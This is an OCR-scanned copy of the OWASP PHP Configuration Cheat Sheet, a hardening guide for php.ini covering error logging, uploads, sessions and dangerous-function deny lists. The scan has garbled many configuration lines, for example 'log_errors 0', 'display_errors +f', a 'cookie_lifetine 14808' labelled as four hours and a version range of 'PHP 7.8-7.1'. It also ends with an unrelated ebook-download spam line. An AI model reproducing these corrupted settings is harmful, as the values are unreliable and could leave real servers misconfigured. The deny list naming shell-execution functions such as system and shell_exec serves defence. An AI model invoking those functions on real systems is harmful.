9123122, 8:48 AM PHP Configuration - OWASP Cheat Sheet Series
PHP Configuration Cheat Sheet
Introduction
This page is meant tohelp those configuring PHP and the web server it is running on to be very
secure.
Below you will ind information on the proper settings for the php.ini file and instructions on
configuring Apache, Noinx, and Caddy web servers.
For general PHP codebase security please refer to the two following great guides:
‘* Paragonie's 2018 PHP Security Guide
«Awesome PHP Security
PHP Configuration and Deployment
php.ini
‘Some of following settings need to be adapted to your system, in particular session. save_path,
session.cookie_path (@g, /var/wm/nysite ),and session.cookie_domain (eg.
ExampleSite.con).
You shouldalso be running PHP 7.2 or later. Ifrunning PHP 7.0 and 7.1, youwill use slightly
different values in a couple of places below (see inline comments). Finally look through the PHP.
Manuel for a complete reference on every value in the php.ini corfiguration file,
You can finda copy of the following values in a ready-to-go php.ini fle here.
PHP entorhanding
expose_php ff
error_reporting ALL
display_errors +f
display_startup_errors = Off
log_errors 0
error_log valid. path/PHP-Logs/phperror-log
ignore_repeated_errors = Off
-ntps:ifcheatshectseries.owasp.orgicheatsheets!PHP_Configuratlon_Cheat_Sheet.himl 489123122, 8:48 AM PHP Configuration - OWASP Cheat Sheet Series
Keep in mind that you need tohave display_errors to off ona production server and it's a good
ideo to frequently nctice the logs.
PHP general settings
doc_root /path/DocumentRoot /PHP-scripts/
open_basedir {path/DocunentRoot/PHP-scripts/
include_path = /path/PHP-pear/
extension.dir /path/PHP-extensions/
ime_magic.magicfile /path/PHP-magic.mine
allow_url_fopen off
allow_url_include = off
variables_order ccs’
allow_webdav_methods off
session.gc_maxlifetime = 600
allow_url_* prevents LFisto be easily escalated to PFs.
PHP file upicad handling
file_uploads = on
upload_tmp_dir = /path/PHP-uploads/
upload_max_filesize = 2M
nax_file_uploads 22
If your application is net using file uploads, and say the only data the user will enter / upload is
forms that donot require any document attachments, file_uploeds shouldbe tuned off .
PHP executable handling
enable_dl off
disable_functions system, exec, shell_exec, passthru, phpinfo, show_source,
Popen, proc_open,
fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_f:
chdir, mkdir, rmdir, chmod, renane,
filepro, filepro.rowcount, filepro_retrieve, posix_nkfifo
# see also: http://ir-php.net/features. safe-mode
disable_classes
These are dangerous PHP functions. You should disable all that you dont use.
PHP session handing
Session settings are some of the MOST important values to concentrate on in configuring. tis @
(good practice to change session.name to something new.
-ntps:ifcheatshectseries.owasp.orgicheatsheets!PHP_Configuratlon_Cheat_Sheet.himl 239723122, 648 AM PHP Configuration - OWASP Cheat Sheet Series
session .save_path = /path/PHP-session/
session.name myPHPSESSTD
session auto_stert off
session .use_trans_sid =o
session .cookie_donain = full qualified. domain .name
session. cookie_path = /application/path/
session .use_strict_mode 1
use_cookies 1
use_only_cookies 1
cookie_lifetine 14808 # 4 hours
cookie_secure “1
cookie_httponly 1
cookie_sanesite = Strict
cache_expire = 30
sid_length = 256
sid_bits_per_character = 6 # PHP 7.2+
hash_funetion 1 # PHP 7.8-7.1
hash_bits.per_character = 6 # PHP 7.8-7.1
‘Some more security paranoid checks
session.referer_check = /application/path
enory-Limit = 50M
post_max_size = 20M
ax_execution_time = 60
report_memleaks = On
track_errors = off
html_errors = off
‘Suhosin
‘Suhosin is a patch to PHP which provides a number of hardening and security features that are not
available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported
‘and should not be used.
For PHP 7, there is Suhosir-ng, but it's in a prerelease stage, and as such should not be used in
production.
‘Snuffleupagus
Snuffleupagus is the spiritual descendent of Suhosin for PHP 7 and onwards, with modem
features, It's considered stable, and is usable in production.
-ntps:ifcheatshectseries.owasp.orgicheatsheets!PHP_Configuratlon_Cheat_Sheet.himl
313
Download PHP: 3 books in 1 : PHP Basics for Beginners + PHP security and session management + Advanced PHP functions Andy Vickler ebook All Chapters PDF